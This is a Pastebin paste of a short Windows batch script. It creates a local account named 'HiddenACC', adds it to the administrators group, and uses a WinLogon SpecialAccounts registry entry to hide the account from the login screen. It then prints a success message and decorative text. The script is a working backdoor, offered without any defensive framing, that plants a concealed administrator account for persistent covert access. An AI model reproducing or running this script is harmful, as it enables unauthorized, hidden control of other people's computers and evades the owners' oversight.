Guest User

Untitled

a guest
Jul 16th, 2018
73
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.69 KB | None | 0 0
  1. @echo off
  2. color 0a
  3. cls
  4. net user /add HiddenACC
  5. net localgroup administrators /add HiddenACC
  6. reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinLogon\SpecialAccounts\UserList" /v HiddenACC /t REG_DWORD /d 0
  7. echo.
  8. echo.
  9. Echo If you see 3 completed commands above, that means you have
  10. echo succesfully added "HiddenACC" account to the database.
  11. echo.
  12. echo Press enter to leave this application.
  13. echo.
  14. echo ? ?
  15. echo ? ? ? ?
  16. echo ? ? ? ? ? ?
  17. echo ? ? ? ? ? ? ? ?
  18. echo ? ? ? ? ? TRIFORCE HAS LEFT THE BUILDING ? ? ? ? ?
  19. pause >nul
Add Comment
Please, Sign In to add comment